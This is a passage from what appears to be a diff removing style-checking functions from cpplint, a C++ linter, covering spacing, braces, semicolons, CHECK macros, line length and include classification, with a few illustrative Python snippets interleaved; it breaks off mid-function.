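Concretely, the two-spaces-before and one-space-after rules for // comments work out like this (a standalone sketch using plain string indexing, mirroring the check above):

line_ok = 'int x = 1;  // two spaces before, one after'
pos = line_ok.find('//')
assert line_ok[pos - 1] == ' ' and line_ok[pos - 2] == ' '   # passes the check
assert line_ok[pos + 2] == ' '                               # space after // -> ok

line_bad = 'int x = 1; // only one space before'
p = line_bad.find('//')
assert line_bad[p - 2] != ' '   # -> "At least two spaces is best between code and comments"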
- if Search(r'[\w.]=[\w.]', line) and not Search(r'\b(if|while) ', line): - error(filename, linenum, 'whitespace/operators', 4, - 'Missing spaces around =') - - # It's ok not to have spaces around binary operators like + - * /, but if - # there's too little whitespace, we get concerned. It's hard to tell, - # though, so we punt on this one for now. TODO. - - # You should always have whitespace around binary operators. - # - # Check <= and >= first to avoid false positives with < and >, then - # check non-include lines for spacing around < and >. - match = Search(r'[^<>=!\s](==|!=|<=|>=)[^<>=!\s]', line) - if match: - error(filename, linenum, 'whitespace/operators', 3, - 'Missing spaces around %s' % match.group(1)) - # We allow no-spaces around << when used like this: 10<<20, but - # not otherwise (particularly, not when used as streams) - # Also ignore using ns::operator<<; - match = Search(r'(operator|\S)(?:L|UL|ULL|l|ul|ull)?<<(\S)', line) - if (match and - not (match.group(1).isdigit() and match.group(2).isdigit()) and - not (match.group(1) == 'operator' and match.group(2) == ';')): - error(filename, linenum, 'whitespace/operators', 3, - 'Missing spaces around <<') - elif not Match(r'#.*include', line): - # Avoid false positives on -> - reduced_line = line.replace('->', '') - - # Look for < that is not surrounded by spaces. This is only - # triggered if both sides are missing spaces, even though - # technically should flag if at least one side is missing a - # space. This is done to avoid some false positives with shifts. - match = Search(r'[^\s<]<([^\s=<].*)', reduced_line) - if (match and - not FindNextMatchingAngleBracket(clean_lines, linenum, match.group(1))): - error(filename, linenum, 'whitespace/operators', 3, - 'Missing spaces around <') - - # Look for > that is not surrounded by spaces. Similar to the - # above, we only trigger if both sides are missing spaces to avoid - # false positives with shifts. - match = Search(r'^(.*[^\s>])>[^\s=>]', reduced_line) - if (match and - not FindPreviousMatchingAngleBracket(clean_lines, linenum, - match.group(1))): - error(filename, linenum, 'whitespace/operators', 3, - 'Missing spaces around >') - - # We allow no-spaces around >> for almost anything. This is because - # C++11 allows ">>" to close nested templates, which accounts for - # most cases when ">>" is not followed by a space. - # - # We still warn on ">>" followed by alpha character, because that is - # likely due to ">>" being used for right shifts, e.g.: - # value >> alpha - # - # When ">>" is used to close templates, the alphanumeric letter that - # follows would be part of an identifier, and there should still be - # a space separating the template type and the identifier. 
- # type> alpha - match = Search(r'>>[a-zA-Z_]', line) - if match: - error(filename, linenum, 'whitespace/operators', 3, - 'Missing spaces around >>') - - # There shouldn't be space around unary operators - match = Search(r'(!\s|~\s|[\s]--[\s;]|[\s]\+\+[\s;])', line) - if match: - error(filename, linenum, 'whitespace/operators', 4, - 'Extra space for operator %s' % match.group(1)) - - # A pet peeve of mine: no spaces after an if, while, switch, or for - match = Search(r' (if\(|for\(|while\(|switch\()', line) - if match: - error(filename, linenum, 'whitespace/parens', 5, - 'Missing space before ( in %s' % match.group(1)) - - # For if/for/while/switch, the left and right parens should be - # consistent about how many spaces are inside the parens, and - # there should either be zero or one spaces inside the parens. - # We don't want: "if ( foo)" or "if ( foo )". - # Exception: "for ( ; foo; bar)" and "for (foo; bar; )" are allowed. - match = Search(r'\b(if|for|while|switch)\s*' - r'\(([ ]*)(.).*[^ ]+([ ]*)\)\s*{\s*$', - line) - if match: - if len(match.group(2)) != len(match.group(4)): - if not (match.group(3) == ';' and - len(match.group(2)) == 1 + len(match.group(4)) or - not match.group(2) and Search(r'\bfor\s*\(.*; \)', line)): - error(filename, linenum, 'whitespace/parens', 5, - 'Mismatching spaces inside () in %s' % match.group(1)) - if len(match.group(2)) not in [0, 1]: - error(filename, linenum, 'whitespace/parens', 5, - 'Should have zero or one spaces inside ( and ) in %s' % - match.group(1)) - - # You should always have a space after a comma (either as fn arg or operator) - # - # This does not apply when the non-space character following the - # comma is another comma, since the only time when that happens is - # for empty macro arguments. - # - # We run this check in two passes: first pass on elided lines to - # verify that lines contain missing whitespaces, second pass on raw - # lines to confirm that those missing whitespaces are not due to - # elided comments. - if Search(r',[^,\s]', line) and Search(r',[^,\s]', raw[linenum]): - error(filename, linenum, 'whitespace/comma', 3, - 'Missing space after ,') - - # You should always have a space after a semicolon - # except for few corner cases - # TODO(unknown): clarify if 'if (1) { return 1;}' is requires one more - # space after ; - if Search(r';[^\s};\\)/]', line): - error(filename, linenum, 'whitespace/semicolon', 3, - 'Missing space after ;') - - # Next we will look for issues with function calls. - CheckSpacingForFunctionCall(filename, line, linenum, error) - - # Except after an opening paren, or after another opening brace (in case of - # an initializer list, for instance), you should have spaces before your - # braces. And since you should never have braces at the beginning of a line, - # this is an easy test. - match = Match(r'^(.*[^ ({]){', line) - if match: - # Try a bit harder to check for brace initialization. This - # happens in one of the following forms: - # Constructor() : initializer_list_{} { ... } - # Constructor{}.MemberFunction() - # Type variable{}; - # FunctionCall(type{}, ...); - # LastArgument(..., type{}); - # LOG(INFO) << type{} << " ..."; - # map_of_type[{...}] = ...; - # - # We check for the character following the closing brace, and - # silence the warning if it's one of those listed above, i.e. - # "{.;,)<]". - # - # To account for nested initializer list, we allow any number of - # closing braces up to "{;,)<". 
We can't simply silence the - # warning on first sight of closing brace, because that would - # cause false negatives for things that are not initializer lists. - # Silence this: But not this: - # Outer{ if (...) { - # Inner{...} if (...){ // Missing space before { - # }; } - # - # There is a false negative with this approach if people inserted - # spurious semicolons, e.g. "if (cond){};", but we will catch the - # spurious semicolon with a separate check. - (endline, endlinenum, endpos) = CloseExpression( - clean_lines, linenum, len(match.group(1))) - trailing_text = '' - if endpos > -1: - trailing_text = endline[endpos:] - for offset in xrange(endlinenum + 1, - min(endlinenum + 3, clean_lines.NumLines() - 1)): - trailing_text += clean_lines.elided[offset] - if not Match(r'^[\s}]*[{.;,)<\]]', trailing_text): - error(filename, linenum, 'whitespace/braces', 5, - 'Missing space before {') - - # Make sure '} else {' has spaces. - if Search(r'}else', line): - error(filename, linenum, 'whitespace/braces', 5, - 'Missing space before else') - - # You shouldn't have spaces before your brackets, except maybe after - # 'delete []' or 'new char * []'. - if Search(r'\w\s+\[', line) and not Search(r'delete\s+\[', line): - error(filename, linenum, 'whitespace/braces', 5, - 'Extra space before [') - - # You shouldn't have a space before a semicolon at the end of the line. - # There's a special case for "for" since the style guide allows space before - # the semicolon there. - if Search(r':\s*;\s*$', line): - error(filename, linenum, 'whitespace/semicolon', 5, - 'Semicolon defining empty statement. Use {} instead.') - elif Search(r'^\s*;\s*$', line): - error(filename, linenum, 'whitespace/semicolon', 5, - 'Line contains only semicolon. If this should be an empty statement, ' - 'use {} instead.') - elif (Search(r'\s+;\s*$', line) and - not Search(r'\bfor\b', line)): - error(filename, linenum, 'whitespace/semicolon', 5, - 'Extra space before last semicolon. If this should be an empty ' - 'statement, use {} instead.') - - # In range-based for, we wanted spaces before and after the colon, but - # not around "::" tokens that might appear. - if (Search('for *\(.*[^:]:[^: ]', line) or - Search('for *\(.*[^: ]:[^:]', line)): - error(filename, linenum, 'whitespace/forcolon', 2, - 'Missing space around colon in range-based for loop') - - -def CheckSectionSpacing(filename, clean_lines, class_info, linenum, error): - """Checks for additional blank line issues related to sections. - - Currently the only thing checked here is blank line before protected/private. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - class_info: A _ClassInfo objects. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - # Skip checks if the class is small, where small means 25 lines or less. - # 25 lines seems like a good cutoff since that's the usual height of - # terminals, and any class that can't fit in one screen can't really - # be considered "small". - # - # Also skip checks if we are on the first line. This accounts for - # classes that look like - # class Foo { public: ... }; - # - # If we didn't find the end of the class, last_line would be zero, - # and the check will be skipped by the first condition. 
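For example, the semicolon and range-based-for patterns above fire as follows (plain re standing in for Search; samples are illustrative, not from the patch):

import re

assert re.search(r'^\s*;\s*$', '  ;')             # Line contains only semicolon -> use {}
assert re.search(r'\s+;\s*$', 'int x = 1 ;')      # Extra space before last semicolon
assert re.search(r'for *\(.*[^:]:[^: ]', 'for (auto x:v) {')       # missing colon spacing
assert not re.search(r'for *\(.*[^:]:[^: ]', 'for (auto x : v) {') # properly spaced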
- if (class_info.last_line - class_info.starting_linenum <= 24 or - linenum <= class_info.starting_linenum): - return - - matched = Match(r'\s*(public|protected|private):', clean_lines.lines[linenum]) - if matched: - # Issue warning if the line before public/protected/private was - # not a blank line, but don't do this if the previous line contains - # "class" or "struct". This can happen two ways: - # - We are at the beginning of the class. - # - We are forward-declaring an inner class that is semantically - # private, but needed to be public for implementation reasons. - # Also ignores cases where the previous line ends with a backslash as can be - # common when defining classes in C macros. - prev_line = clean_lines.lines[linenum - 1] - if (not IsBlankLine(prev_line) and - not Search(r'\b(class|struct)\b', prev_line) and - not Search(r'\\$', prev_line)): - # Try a bit harder to find the beginning of the class. This is to - # account for multi-line base-specifier lists, e.g.: - # class Derived - # : public Base { - end_class_head = class_info.starting_linenum - for i in range(class_info.starting_linenum, linenum): - if Search(r'\{\s*$', clean_lines.lines[i]): - end_class_head = i - break - if end_class_head < linenum - 1: - error(filename, linenum, 'whitespace/blank_line', 3, - '"%s:" should be preceded by a blank line' % matched.group(1)) - - -def GetPreviousNonBlankLine(clean_lines, linenum): - """Return the most recent non-blank line and its line number. - - Args: - clean_lines: A CleansedLines instance containing the file contents. - linenum: The number of the line to check. - - Returns: - A tuple with two elements. The first element is the contents of the last - non-blank line before the current line, or the empty string if this is the - first non-blank line. The second is the line number of that line, or -1 - if this is the first non-blank line. - """ - - prevlinenum = linenum - 1 - while prevlinenum >= 0: - prevline = clean_lines.elided[prevlinenum] - if not IsBlankLine(prevline): # if not a blank line... - return (prevline, prevlinenum) - prevlinenum -= 1 - return ('', -1) - - -def CheckBraces(filename, clean_lines, linenum, error): - """Looks for misplaced braces (e.g. at the end of line). - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - - line = clean_lines.elided[linenum] # get rid of comments and strings - - if Match(r'\s*{\s*$', line): - # We allow an open brace to start a line in the case where someone is using - # braces in a block to explicitly create a new scope, which is commonly used - # to control the lifetime of stack-allocated variables. Braces are also - # used for brace initializers inside function calls. We don't detect this - # perfectly: we just don't complain if the last non-whitespace character on - # the previous non-blank line is ',', ';', ':', '(', '{', or '}', or if the - # previous line starts a preprocessor block. - prevline = GetPreviousNonBlankLine(clean_lines, linenum)[0] - if (not Search(r'[,;:}{(]\s*$', prevline) and - not Match(r'\s*#', prevline)): - error(filename, linenum, 'whitespace/braces', 4, - '{ should almost always be at the end of the previous line') - - # An else clause should be on the same line as the preceding closing brace. 
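A standalone sketch of that opening-brace rule, with prevline standing in for GetPreviousNonBlankLine():

import re

prevline = 'if (condition)'      # previous non-blank line ends in ')'
line = '{'
warn = (re.match(r'\s*{\s*$', line) and
        not re.search(r'[,;:}{(]\s*$', prevline) and
        not re.match(r'\s*#', prevline))
assert warn   # -> "{ should almost always be at the end of the previous line"
# With prevline = 'MyClass::MyClass() :' the trailing ':' suppresses the warning.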
- if Match(r'\s*else\s*', line): - prevline = GetPreviousNonBlankLine(clean_lines, linenum)[0] - if Match(r'\s*}\s*$', prevline): - error(filename, linenum, 'whitespace/newline', 4, - 'An else should appear on the same line as the preceding }') - - # If braces come on one side of an else, they should be on both. - # However, we have to worry about "else if" that spans multiple lines! - if Search(r'}\s*else[^{]*$', line) or Match(r'[^}]*else\s*{', line): - if Search(r'}\s*else if([^{]*)$', line): # could be multi-line if - # find the ( after the if - pos = line.find('else if') - pos = line.find('(', pos) - if pos > 0: - (endline, _, endpos) = CloseExpression(clean_lines, linenum, pos) - if endline[endpos:].find('{') == -1: # must be brace after if - error(filename, linenum, 'readability/braces', 5, - 'If an else has a brace on one side, it should have it on both') - else: # common case: else not followed by a multi-line if - error(filename, linenum, 'readability/braces', 5, - 'If an else has a brace on one side, it should have it on both') - - # Likewise, an else should never have the else clause on the same line - if Search(r'\belse [^\s{]', line) and not Search(r'\belse if\b', line): - error(filename, linenum, 'whitespace/newline', 4, - 'Else clause should never be on same line as else (use 2 lines)') - - # In the same way, a do/while should never be on one line - if Match(r'\s*do [^\s{]', line): - error(filename, linenum, 'whitespace/newline', 4, - 'do/while clauses should not be on a single line') - - # Block bodies should not be followed by a semicolon. Due to C++11 - # brace initialization, there are more places where semicolons are - # required than not, so we use a whitelist approach to check these - # rather than a blacklist. These are the places where "};" should - # be replaced by just "}": - # 1. Some flavor of block following closing parenthesis: - # for (;;) {}; - # while (...) {}; - # switch (...) {}; - # Function(...) {}; - # if (...) {}; - # if (...) else if (...) {}; - # - # 2. else block: - # if (...) else {}; - # - # 3. const member function: - # Function(...) const {}; - # - # 4. Block following some statement: - # x = 42; - # {}; - # - # 5. Block at the beginning of a function: - # Function(...) { - # {}; - # } - # - # Note that naively checking for the preceding "{" will also match - # braces inside multi-dimensional arrays, but this is fine since - # that expression will not contain semicolons. - # - # 6. Block following another block: - # while (true) {} - # {}; - # - # 7. End of namespaces: - # namespace {}; - # - # These semicolons seems far more common than other kinds of - # redundant semicolons, possibly due to people converting classes - # to namespaces. For now we do not warn for this case. - # - # Try matching case 1 first. - match = Match(r'^(.*\)\s*)\{', line) - if match: - # Matched closing parenthesis (case 1). Check the token before the - # matching opening parenthesis, and don't warn if it looks like a - # macro. 
This avoids these false positives: - # - macro that defines a base class - # - multi-line macro that defines a base class - # - macro that defines the whole class-head - # - # But we still issue warnings for macros that we know are safe to - # warn, specifically: - # - TEST, TEST_F, TEST_P, MATCHER, MATCHER_P - # - TYPED_TEST - # - INTERFACE_DEF - # - EXCLUSIVE_LOCKS_REQUIRED, SHARED_LOCKS_REQUIRED, LOCKS_EXCLUDED: - # - # We implement a whitelist of safe macros instead of a blacklist of - # unsafe macros, even though the latter appears less frequently in - # google code and would have been easier to implement. This is because - # the downside for getting the whitelist wrong means some extra - # semicolons, while the downside for getting the blacklist wrong - # would result in compile errors. - # - # In addition to macros, we also don't want to warn on compound - # literals. - closing_brace_pos = match.group(1).rfind(')') - opening_parenthesis = ReverseCloseExpression( - clean_lines, linenum, closing_brace_pos) - if opening_parenthesis[2] > -1: - line_prefix = opening_parenthesis[0][0:opening_parenthesis[2]] - macro = Search(r'\b([A-Z_]+)\s*$', line_prefix) - if ((macro and - macro.group(1) not in ( - 'TEST', 'TEST_F', 'MATCHER', 'MATCHER_P', 'TYPED_TEST', - 'EXCLUSIVE_LOCKS_REQUIRED', 'SHARED_LOCKS_REQUIRED', - 'LOCKS_EXCLUDED', 'INTERFACE_DEF')) or - Search(r'\s+=\s*$', line_prefix)): - match = None - # Whitelist lambda function definition which also requires a ";" after - # closing brace - if match: - if Match(r'^.*\[.*\]\s*(.*\)\s*)\{', line): - match = None - - else: - # Try matching cases 2-3. - match = Match(r'^(.*(?:else|\)\s*const)\s*)\{', line) - if not match: - # Try matching cases 4-6. These are always matched on separate lines. - # - # Note that we can't simply concatenate the previous line to the - # current line and do a single match, otherwise we may output - # duplicate warnings for the blank line case: - # if (cond) { - # // blank line - # } - prevline = GetPreviousNonBlankLine(clean_lines, linenum)[0] - if prevline and Search(r'[;{}]\s*$', prevline): - match = Match(r'^(\s*)\{', line) - - # Check matching closing brace - if match: - (endline, endlinenum, endpos) = CloseExpression( - clean_lines, linenum, len(match.group(1))) - if endpos > -1 and Match(r'^\s*;', endline[endpos:]): - # Current {} pair is eligible for semicolon check, and we have found - # the redundant semicolon, output warning here. - # - # Note: because we are scanning forward for opening braces, and - # outputting warnings for the matching closing brace, if there are - # nested blocks with trailing semicolons, we will get the error - # messages in reversed order. - error(filename, endlinenum, 'readability/braces', 4, - "You don't need a ; after a }") - - -def CheckEmptyBlockBody(filename, clean_lines, linenum, error): - """Look for empty loop/conditional body with only a single semicolon. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - - # Search for loop keywords at the beginning of the line. Because only - # whitespaces are allowed before the keywords, this will also ignore most - # do-while-loops, since those lines should start with closing brace. - # - # We also check "if" blocks here, since an empty conditional block - # is likely an error. 
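To see the empty-body rule concretely (str.rfind() stands in for CloseExpression() on this one-liner; illustration only):

import re

line = 'while (Pending());'
matched = re.match(r'\s*(for|while|if)\s*\(', line)
end_pos = line.rfind(')')            # stand-in for CloseExpression() here
assert matched and line[end_pos + 1] == ';'
# matched.group(1) == 'while' -> "Empty loop bodies should use {} or continue"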
- line = clean_lines.elided[linenum] - matched = Match(r'\s*(for|while|if)\s*\(', line) - if matched: - # Find the end of the conditional expression - (end_line, end_linenum, end_pos) = CloseExpression( - clean_lines, linenum, line.find('(')) - - # Output warning if what follows the condition expression is a semicolon. - # No warning for all other cases, including whitespace or newline, since we - # have a separate check for semicolons preceded by whitespace. - if end_pos >= 0 and Match(r';', end_line[end_pos:]): - if matched.group(1) == 'if': - error(filename, end_linenum, 'whitespace/empty_conditional_body', 5, - 'Empty conditional bodies should use {}') - else: - error(filename, end_linenum, 'whitespace/empty_loop_body', 5, - 'Empty loop bodies should use {} or continue') - - -def CheckCheck(filename, clean_lines, linenum, error): - """Checks the use of CHECK and EXPECT macros. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - - # Decide the set of replacement macros that should be suggested - lines = clean_lines.elided - check_macro = None - start_pos = -1 - for macro in _CHECK_MACROS: - i = lines[linenum].find(macro) - if i >= 0: - check_macro = macro - - # Find opening parenthesis. Do a regular expression match here - # to make sure that we are matching the expected CHECK macro, as - # opposed to some other macro that happens to contain the CHECK - # substring. - matched = Match(r'^(.*\b' + check_macro + r'\s*)\(', lines[linenum]) - if not matched: - continue - start_pos = len(matched.group(1)) - break - if not check_macro or start_pos < 0: - # Don't waste time here if line doesn't contain 'CHECK' or 'EXPECT' - return - - # Find end of the boolean expression by matching parentheses - (last_line, end_line, end_pos) = CloseExpression( - clean_lines, linenum, start_pos) - if end_pos < 0: - return - if linenum == end_line: - expression = lines[linenum][start_pos + 1:end_pos - 1] - else: - expression = lines[linenum][start_pos + 1:] - for i in xrange(linenum + 1, end_line): - expression += lines[i] - expression += last_line[0:end_pos - 1] - - # Parse expression so that we can take parentheses into account. - # This avoids false positives for inputs like "CHECK((a < 4) == b)", - # which is not replaceable by CHECK_LE. - lhs = '' - rhs = '' - operator = None - while expression: - matched = Match(r'^\s*(<<|<<=|>>|>>=|->\*|->|&&|\|\||' - r'==|!=|>=|>|<=|<|\()(.*)$', expression) - if matched: - token = matched.group(1) - if token == '(': - # Parenthesized operand - expression = matched.group(2) - (end, _) = FindEndOfExpressionInLine(expression, 0, 1, '(', ')') - if end < 0: - return # Unmatched parenthesis - lhs += '(' + expression[0:end] - expression = expression[end:] - elif token in ('&&', '||'): - # Logical and/or operators. This means the expression - # contains more than one term, for example: - # CHECK(42 < a && a < b); - # - # These are not replaceable with CHECK_LE, so bail out early. - return - elif token in ('<<', '<<=', '>>', '>>=', '->*', '->'): - # Non-relational operator - lhs += token - expression = matched.group(2) - else: - # Relational operator - operator = token - rhs = matched.group(2) - break - else: - # Unparenthesized operand. Instead of appending to lhs one character - # at a time, we do another regular expression match to consume several - # characters at once if possible. 
Trivial benchmark shows that this - # is more efficient when the operands are longer than a single - # character, which is generally the case. - matched = Match(r'^([^-=!<>()&|]+)(.*)$', expression) - if not matched: - matched = Match(r'^(\s*\S)(.*)$', expression) - if not matched: - break - lhs += matched.group(1) - expression = matched.group(2) - - # Only apply checks if we got all parts of the boolean expression - if not (lhs and operator and rhs): - return - - # Check that rhs do not contain logical operators. We already know - # that lhs is fine since the loop above parses out && and ||. - if rhs.find('&&') > -1 or rhs.find('||') > -1: - return - - # At least one of the operands must be a constant literal. This is - # to avoid suggesting replacements for unprintable things like - # CHECK(variable != iterator) - # - # The following pattern matches decimal, hex integers, strings, and - # characters (in that order). - lhs = lhs.strip() - rhs = rhs.strip() - match_constant = r'^([-+]?(\d+|0[xX][0-9a-fA-F]+)[lLuU]{0,3}|".*"|\'.*\')$' - if Match(match_constant, lhs) or Match(match_constant, rhs): - # Note: since we know both lhs and rhs, we can provide a more - # descriptive error message like: - # Consider using CHECK_EQ(x, 42) instead of CHECK(x == 42) - # Instead of: - # Consider using CHECK_EQ instead of CHECK(a == b) - # - # We are still keeping the less descriptive message because if lhs - # or rhs gets long, the error message might become unreadable. - error(filename, linenum, 'readability/check', 2, - 'Consider using %s instead of %s(a %s b)' % ( - _CHECK_REPLACEMENT[check_macro][operator], - check_macro, operator)) - - -def CheckAltTokens(filename, clean_lines, linenum, error): - """Check alternative keywords being used in boolean expressions. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] - - # Avoid preprocessor lines - if Match(r'^\s*#', line): - return - - # Last ditch effort to avoid multi-line comments. This will not help - # if the comment started before the current line or ended after the - # current line, but it catches most of the false positives. At least, - # it provides a way to workaround this warning for people who use - # multi-line comments in preprocessor macros. - # - # TODO(unknown): remove this once cpplint has better support for - # multi-line comments. - if line.find('/*') >= 0 or line.find('*/') >= 0: - return - - for match in _ALT_TOKEN_REPLACEMENT_PATTERN.finditer(line): - error(filename, linenum, 'readability/alt_tokens', 2, - 'Use operator %s instead of %s' % ( - _ALT_TOKEN_REPLACEMENT[match.group(1)], match.group(1))) - - -def GetLineWidth(line): - """Determines the width of the line in column positions. - - Args: - line: A string, which may be a Unicode string. - - Returns: - The width of the line in column positions, accounting for Unicode - combining characters and wide characters. - """ - if isinstance(line, unicode): - width = 0 - for uc in unicodedata.normalize('NFC', line): - if unicodedata.east_asian_width(uc) in ('W', 'F'): - width += 2 - elif not unicodedata.combining(uc): - width += 1 - return width - else: - return len(line) - - -def CheckStyle(filename, clean_lines, linenum, file_extension, nesting_state, - error): - """Checks rules from the 'C++ style rules' section of cppguide.html. 
- - Most of these rules are hard to test (naming, comment style), but we - do what we can. In particular we check for 2-space indents, line lengths, - tab usage, spaces inside code, etc. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - file_extension: The extension (without the dot) of the filename. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: The function to call with any errors found. - """ - - # Don't use "elided" lines here, otherwise we can't check commented lines. - # Don't want to use "raw" either, because we don't want to check inside C++11 - # raw strings, - raw_lines = clean_lines.lines_without_raw_strings - line = raw_lines[linenum] - - if line.find('\t') != -1: - error(filename, linenum, 'whitespace/tab', 1, - 'Tab found; better to use spaces') - - # One or three blank spaces at the beginning of the line is weird; it's - # hard to reconcile that with 2-space indents. - # NOTE: here are the conditions rob pike used for his tests. Mine aren't - # as sophisticated, but it may be worth becoming so: RLENGTH==initial_spaces - # if(RLENGTH > 20) complain = 0; - # if(match($0, " +(error|private|public|protected):")) complain = 0; - # if(match(prev, "&& *$")) complain = 0; - # if(match(prev, "\\|\\| *$")) complain = 0; - # if(match(prev, "[\",=><] *$")) complain = 0; - # if(match($0, " <<")) complain = 0; - # if(match(prev, " +for \\(")) complain = 0; - # if(prevodd && match(prevprev, " +for \\(")) complain = 0; - initial_spaces = 0 - cleansed_line = clean_lines.elided[linenum] - while initial_spaces < len(line) and line[initial_spaces] == ' ': - initial_spaces += 1 - if line and line[-1].isspace(): - error(filename, linenum, 'whitespace/end_of_line', 4, - 'Line ends in whitespace. Consider deleting these extra spaces.') - # There are certain situations we allow one space, notably for section labels - elif ((initial_spaces == 1 or initial_spaces == 3) and - not Match(r'\s*\w+\s*:\s*$', cleansed_line)): - error(filename, linenum, 'whitespace/indent', 3, - 'Weird number of spaces at line-start. ' - 'Are you using a 2-space indent?') - - # Check if the line is a header guard. - is_header_guard = False - if file_extension == 'h': - cppvar = GetHeaderGuardCPPVariable(filename) - if (line.startswith('#ifndef %s' % cppvar) or - line.startswith('#define %s' % cppvar) or - line.startswith('#endif // %s' % cppvar)): - is_header_guard = True - # #include lines and header guards can be long, since there's no clean way to - # split them. - # - # URLs can be long too. It's possible to split these, but it makes them - # harder to cut&paste. - # - # The "$Id:...$" comment may also get very long without it being the - # developers fault. - if (not line.startswith('#include') and not is_header_guard and - not Match(r'^\s*//.*http(s?)://\S*$', line) and - not Match(r'^// \$Id:.*#[0-9]+ \$$', line)): - line_width = GetLineWidth(line) - extended_length = int((_line_length * 1.25)) - if line_width > extended_length: - error(filename, linenum, 'whitespace/line_length', 4, - 'Lines should very rarely be longer than %i characters' % - extended_length) - elif line_width > _line_length: - error(filename, linenum, 'whitespace/line_length', 2, - 'Lines should be <= %i characters long' % _line_length) - - if (cleansed_line.count(';') > 1 and - # for loops are allowed two ;'s (and may run over two lines). 
- cleansed_line.find('for') == -1 and - (GetPreviousNonBlankLine(clean_lines, linenum)[0].find('for') == -1 or - GetPreviousNonBlankLine(clean_lines, linenum)[0].find(';') != -1) and - # It's ok to have many commands in a switch case that fits in 1 line - not ((cleansed_line.find('case ') != -1 or - cleansed_line.find('default:') != -1) and - cleansed_line.find('break;') != -1)): - error(filename, linenum, 'whitespace/newline', 0, - 'More than one command on the same line') - - # Some more style checks - CheckBraces(filename, clean_lines, linenum, error) - CheckEmptyBlockBody(filename, clean_lines, linenum, error) - CheckAccess(filename, clean_lines, linenum, nesting_state, error) - CheckSpacing(filename, clean_lines, linenum, nesting_state, error) - CheckCheck(filename, clean_lines, linenum, error) - CheckAltTokens(filename, clean_lines, linenum, error) - classinfo = nesting_state.InnermostClass() - if classinfo: - CheckSectionSpacing(filename, clean_lines, classinfo, linenum, error) - - -_RE_PATTERN_INCLUDE_NEW_STYLE = re.compile(r'#include +"[^/]+\.h"') -_RE_PATTERN_INCLUDE = re.compile(r'^\s*#\s*include\s*([<"])([^>"]*)[>"].*$') -# Matches the first component of a filename delimited by -s and _s. That is: -# _RE_FIRST_COMPONENT.match('foo').group(0) == 'foo' -# _RE_FIRST_COMPONENT.match('foo.cc').group(0) == 'foo' -# _RE_FIRST_COMPONENT.match('foo-bar_baz.cc').group(0) == 'foo' -# _RE_FIRST_COMPONENT.match('foo_bar-baz.cc').group(0) == 'foo' -_RE_FIRST_COMPONENT = re.compile(r'^[^-_.]+') - - -def _DropCommonSuffixes(filename): - """Drops common suffixes like _test.cc or -inl.h from filename. - - For example: - >>> _DropCommonSuffixes('foo/foo-inl.h') - 'foo/foo' - >>> _DropCommonSuffixes('foo/bar/foo.cc') - 'foo/bar/foo' - >>> _DropCommonSuffixes('foo/foo_internal.h') - 'foo/foo' - >>> _DropCommonSuffixes('foo/foo_unusualinternal.h') - 'foo/foo_unusualinternal' - - Args: - filename: The input filename. - - Returns: - The filename with the common suffix removed. - """ - for suffix in ('test.cc', 'regtest.cc', 'unittest.cc', - 'inl.h', 'impl.h', 'internal.h'): - if (filename.endswith(suffix) and len(filename) > len(suffix) and - filename[-len(suffix) - 1] in ('-', '_')): - return filename[:-len(suffix) - 1] - return os.path.splitext(filename)[0] - - -def _IsTestFilename(filename): - """Determines if the given filename has a suffix that identifies it as a test. - - Args: - filename: The input filename. - - Returns: - True if 'filename' looks like a test, False otherwise. - """ - if (filename.endswith('_test.cc') or - filename.endswith('_unittest.cc') or - filename.endswith('_regtest.cc')): - return True - else: - return False - - -def _ClassifyInclude(fileinfo, include, is_system): - """Figures out what kind of header 'include' is. - - Args: - fileinfo: The current file cpplint is running over. A FileInfo instance. - include: The path to a #included file. - is_system: True if the #include used <> rather than "". - - Returns: - One of the _XXX_HEADER constants. - - For example: - >>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'stdio.h', True) - _C_SYS_HEADER - >>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'string', True) - _CPP_SYS_HEADER - >>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'foo/foo.h', False) - _LIKELY_MY_HEADER - >>> _ClassifyInclude(FileInfo('foo/foo_unknown_extension.cc'), - ... 
'bar/foo_other_ext.h', False) - _POSSIBLE_MY_HEADER - >>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'foo/bar.h', False) - _OTHER_HEADER - """ - # This is a list of all standard c++ header files, except - # those already checked for above. - is_cpp_h = include in _CPP_HEADERS - - if is_system: - if is_cpp_h: - return _CPP_SYS_HEADER - else: - return _C_SYS_HEADER - - # If the target file and the include we're checking share a - # basename when we drop common extensions, and the include - # lives in . , then it's likely to be owned by the target file. - target_dir, target_base = ( - os.path.split(_DropCommonSuffixes(fileinfo.RepositoryName()))) - include_dir, include_base = os.path.split(_DropCommonSuffixes(include)) - if target_base == include_base and ( - include_dir == target_dir or - include_dir == os.path.normpath(target_dir + '/../public')): - return _LIKELY_MY_HEADER - - # If the target and include share some initial basename - # component, it's possible the target is implementing the - # include, so it's allowed to be first, but we'll never - # complain if it's not there. - target_first_component = _RE_FIRST_COMPONENT.match(target_base) - include_first_component = _RE_FIRST_COMPONENT.match(include_base) - if (target_first_component and include_first_component and - target_first_component.group(0) == - include_first_component.group(0)): - return _POSSIBLE_MY_HEADER - - return _OTHER_HEADER - - - -def CheckIncludeLine(filename, clean_lines, linenum, include_state, error): - """Check rules that are applicable to #include lines. - - Strings on #include lines are NOT removed from elided line, to make - certain tasks easier. However, to prevent false positives, checks - applicable to #include lines in CheckLanguage must be put here. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - include_state: An _IncludeState instance in which the headers are inserted. - error: The function to call with any errors found. - """ - fileinfo = FileInfo(filename) - - line = clean_lines.lines[linenum] - - # "include" should use the new style "foo/bar.h" instead of just "bar.h" - if 